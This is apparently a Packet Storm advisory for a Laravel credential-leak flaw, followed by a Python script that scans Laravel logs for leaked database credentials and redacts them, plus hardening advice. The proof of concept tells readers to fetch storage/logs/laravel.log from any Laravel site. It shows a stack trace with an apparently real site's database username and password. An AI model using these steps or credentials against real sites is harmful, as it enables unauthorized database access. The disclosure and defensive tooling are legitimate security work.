packetstorm | Huseein Amer | PACKETSTORM:178210
History: Apr 22, 2024 - 12:00 a.m.

Laravel Framework 11 Credential Disclosure

packetstormsecurity.com

AI Score: 7.1 High (Confidence: Low)

EPSS: 0.001 Low (Percentile: 41.8%)

`# Exploit Title: Laravel Framework 11 - Credential Leakage  
# Google Dork: N/A  
# Date: [2024-04-19]  
# Exploit Author: Huseein Amer  
# Vendor Homepage: [https://laravel.com/]  
# Software Link: N/A  
# Version: 8.* - 11.* (REQUIRED)  
# Tested on: [N/A]  
# CVE : CVE-2024-29291  
  
Proof of concept:  
Go to any Laravel-based website and navigate to storage/logs/laravel.log.  
  
Open the file and search for "PDO->__construct('mysql:host=".  
The result:  
#0  
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):  
PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',  
Array)  
#1  
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):  
Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',  
'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)  
Credentials:  
Username: u429384055_jscv  
Password: Jaly$$a0p0p0p0  
Host: sql1...  
  
`
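
A defender-side check for the exposure described above, added here as an example (it is not part of the original advisory or of Laravel's code): it scans a Laravel log for the two PDO frames shown in the trace, reports which database account needs rotating, and produces a redacted copy of the log. The log lines and credentials in `SAMPLE_LOG` are constructed placeholders, and `scan`, `ARG` and `FRAME` are names chosen for this example.

```python
import re

# One single-quoted argument as PHP prints it in a stack trace. PHP truncates
# long string arguments to 15 characters plus "...", so shorter passwords are
# written to the log in full.
ARG = r"'(.*?)'(?=\s*[,)])"
# The two frames from the advisory's trace: PDO->__construct(dsn, user, pass, ...)
# and Connector->createPdoConnection(dsn, user, pass, ...).
FRAME = re.compile(r"(PDO->__construct|createPdoConnection)\(\s*" + r"\s*,\s*".join([ARG] * 3))

# Constructed sample log; paths, host, user and password are placeholders.
SAMPLE_LOG = """\
[2024-01-01 00:00:00] production.ERROR: SQLSTATE[HY000] [2002] Connection refused
#0 /var/www/app/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=db.e...', 'app_user', 'EXAMPLE-pass', Array)
#1 /var/www/app/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\\Database\\Connectors\\Connector->createPdoConnection('mysql:host=db.e...', 'app_user', 'EXAMPLE-pass', Array)
#2 /var/www/app/app/Http/Controllers/HomeController.php(12): App\\Http\\Controllers\\HomeController->index()
"""


def scan(log_text):
    """Return (findings, redacted_text) for the contents of a laravel.log file."""
    findings, redacted = [], []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for m in FRAME.finditer(line):
            call, dsn, user, pw = m.groups()
            findings.append({
                "line": lineno, "call": call, "dsn": dsn, "user": user,
                # Report only the length and whether PHP cut the value short.
                "password_len": len(pw), "truncated": pw.endswith("..."),
            })
        # Keep the DSN for triage, blank out the username and password.
        redacted.append(FRAME.sub(r"\1('\2', '[REDACTED]', '[REDACTED]'", line))
    return findings, "\n".join(redacted)


if __name__ == "__main__":
    findings, redacted = scan(SAMPLE_LOG)
    for f in findings:
        print(f)
    print(redacted)
```

Setting `zend.exception_ignore_args = On` in php.ini keeps call arguments out of new traces, and serving only the application's `public/` directory keeps `storage/` off the web.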
